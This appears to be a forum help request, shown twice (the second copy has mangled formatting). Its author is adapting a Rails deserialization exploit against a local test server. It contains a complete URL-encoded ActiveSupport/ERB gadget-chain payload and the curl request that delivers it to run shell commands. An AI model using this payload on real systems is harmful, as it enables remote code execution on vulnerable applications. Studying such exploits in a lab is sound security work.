I am able to use the provided exploit code to create the /tmp/rce file, by running the curl command twice.
However, I cannot modify the code to create other files or run other commands.
I changed the code touch /tmp/rce to touch /tmp/rce2 and ran the rest of the Ruby code in the same way.
From this, I generated the payload %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
And ran the request curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T' twice.
However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as rm, echo 'x' > /tmp/rce, or ping.
Do you have any advice on why this is not working?
Hi,
I am able to use the provided exploit code to create the /tmp/rce file, by running the
curlcommand twice. However, I cannot modify the code to create other files or run other commands.I changed the code
touch /tmp/rcetotouch /tmp/rce2and ran the rest of the Ruby code in the same way.From this, I generated the payload
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09TAnd ran the request
curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'twice.However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as
rm,echo 'x' > /tmp/rce, orping.Do you have any advice on why this is not working?
Thank you!